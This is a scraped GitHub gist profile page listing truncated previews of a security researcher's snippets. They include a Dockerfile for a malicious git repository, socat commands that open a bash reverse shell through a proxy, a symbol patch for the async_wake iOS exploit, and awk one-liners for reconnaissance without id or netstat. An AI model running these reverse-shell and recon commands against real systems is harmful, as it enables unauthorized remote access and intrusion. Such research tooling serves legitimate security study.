Skip to content

Instantly share code, notes, and snippets.


Etienne Stalmans staaldraad

View GitHub Profile

Based on excellent write-up from

Doesn't work to use YAML.dump(payload) in the above script. This only produces the following YAML, which is worthless:

--- !ruby/object:Gem::Requirement
- - ">="
  - !ruby/object:Gem::Version
    version: '0'
staaldraad / Dockerfile
Created Sep 4, 2018
Dockerfile to get a malicious git Repository up and running
View Dockerfile
FROM ubuntu:16.04
RUN apt update ; \
apt install -y git apache2
RUN mkdir /srv/git
COPY git-http.conf .
RUN cat git-http.conf >> /etc/apache2/apache2.conf
View socat through proxy
# Listener on x.x.x.x:443:
socat file:`tty`,raw,echo=0 tcp-listen:443
# Reverse shell proxy server is at
socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:,proxyport=8222 &
socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"

Keybase proof

I hereby claim:

  • I am staaldraad on github.
  • I am staaldraad ( on keybase.
  • I have a public key ASBLRjbIk9YHmGLclVKxEorNIKsYZgbdW0uh0ugCrhdGYwo

To claim this, I am signing this object:

staaldraad / async_ios_11_1_2.patch
Last active May 2, 2019
Add iPhone 6 symbols along with the symbols @cji added for ipad mini 2.
View async_ios_11_1_2.patch
--- async_wake_ios 2/async_wake_ios/symbols.c 2017-12-11 17:01:53.000000000 +0100
+++ async_wake_ios/async_wake_ios/symbols.c 2017-12-13 13:17:32.000000000 +0100
@@ -131,6 +131,50 @@
0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
+uint64_t ksymbols_iphone_6_15b202[] = {
staaldraad /
Created Dec 12, 2017
Get the uid, gid and user groups without touching /etc/passwd or running the `id` command
awk -F: 'END {print "uid:"u" gid:"g" groups:"gg}{if($1=="Uid"){split($2,a," ");u=a[1]}if($1=="Gid"){split($2,a," ");g=a[1]}if($1=="Groups"){gg=$2}}' /proc/self/status
staaldraad /
Last active Oct 8, 2020
AWK to get details from /proc/net/tcp and /proc/net/udp when netstat and lsof are not available
# Gawk version
# Remote
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
# Local
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
# No Gawk
# Local
grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){
print("Converts a string to the {QUOTE} Field code")
st = raw_input("String to convert: ")
v = map(lambda y: "%s"%ord(y),st)
print("{ QUOTE %s }"%' '.join(v))
staaldraad / oauthServer.go
Last active Jul 14, 2020
A mini OAuth server for Azure
View oauthServer.go
package main
import (
View findForms.ps1
Add-Type -assembly "Microsoft.Office.Interop.Outlook";
$outlook = New-Object -comobject Outlook.Application;
$mapi = $outlook.GetNamespace("MAPI")
$fld = $outlook.Session.GetDefaultFolder(6);
$t = $fld.GetTable("[MessageClass] = 'IPM.Microsoft.FolderDesign.FormsDescription'",1);
$c = $t.GetRowCount();
while($c -gt 0) {
$r = $t.GetNextRow();
$itm = $mapi.GetItemFromID($r.item(1));
You can’t perform that action at this time.